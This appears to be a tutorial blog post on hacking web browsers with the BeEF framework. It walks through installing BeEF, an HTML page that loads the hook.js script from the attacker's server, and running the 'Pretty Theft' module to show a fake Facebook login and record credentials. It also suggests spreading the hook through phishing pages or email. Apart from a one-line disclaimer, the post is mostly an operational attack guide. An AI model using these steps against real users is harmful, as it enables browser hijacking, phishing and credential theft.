How to Hack Web Browsers with BeEF Framework

BeEF hacking involves hooking one or more web browsers and using them to launch command modules to attack the target system within the browser.

BeEF works by using a JavaScript file named hook.js. The job of the attacker is to find a way to run this JavaScript on the victim’s browser.

Once it’s been run, he will have control over their browser in various aspects. There are multiple ways he can execute this script. For example, he could set up a phishing page with the hook inside of the HTML code.

Install the BeEF Framework

A Linux OS is required to install BeEF on your local machine. You can directly install the package with the following command:

apt install beef-xss

Use the following command to start BeEF:

beef-xss

[22:07:06][*] BeEF is loading. Wait a few seconds...
[22:07:09][*] 8 extensions enabled:
[22:07:09]    |   Proxy
[22:07:09]    |   Demos
[22:07:09]    |   XSSRays
[22:07:09]    |   Events
[22:07:09]    |   Admin UI
[22:07:09]    |   Social Engineering
[22:07:09]    |   Network
[22:07:09]    |_  Requester
[22:07:09][*] 303 modules enabled.
[22:07:09][*] 1 network interfaces were detected.
[22:07:09][*] running on network interface: 
[22:07:09]    |   Hook URL: http://127.0.0.1:3000/hook.js
[22:07:09]    |_  UI URL:   http://127.0.0.1:3000/ui/panel
[22:07:09][*] RESTful API key: 43f6880f37e0c0b41b1e98935862bb2cf6a63266
[22:07:09][!] [GeoIP] Could not find MaxMind GeoIP database: 
[22:07:09]    |_  Run geoipupdate to install
[22:07:09][*] HTTP Proxy: http://127.0.0.1:6789
[22:07:09][*] BeEF server started (press control+c to stop)

The two important links are:

The “Hook URL” is the JavaScript you need to try and get your victim to run.

The “UI URL” is the web interface for BeEF where you’ll be able to monitor and carry out the attacks.

You can access the BeEF web interface by typing the following URL in your web browser:

http://127.0.0.1:3000/ui/panel

The default credentials are beef for the username and beef for the password.

After logging in successfully, you should see the “Getting Started” page with information about how BeEF works. From here you can see the hacked/hooked browsers both online and offline.

Hook the Target Browser

In order for a web browser to be “hooked,” you need the client to visit a website with the “hook.js” JavaScript file.

So, to demonstrate this I’m going to create a very basic HTML page to load the JavaScript file. This could be placed on a web server, put on a file server, emailed to someone, etc.

<html>
<head>
<script src="http://127.0.0.1:3000/hook.js" type='text/javascript'></script>
</head>
<body>
Your browser is hooked!
</body>
</html>

As you can see a new online browser has been added to the hooked browsers section.

Now that I have a hooked browser, I can execute some of the built-in modules from the “Commands” tab.

Phishing Attack

To perform a basic phishing attack, navigate to Commands > Social Engineering > Pretty Theft on the web interface of BeEF.

Click on the Execute button.

This will cause a fake Facebook session timeout page to appear on the victim webpage, asking for user credentials.

I’m going to enter some fake credentials.

As you can see “test@zyx” and “p@ssw0rd” was recorded!

Conclusion

BeEF is a powerful tool for exploiting web browsers, and it’s an example of why you should never click on suspicious links. Also, you should be really careful with anything that pops up in your browser.

Note: This information shall only be used to expand knowledge and not for causing malicious or damaging attacks.

Thank you for reading!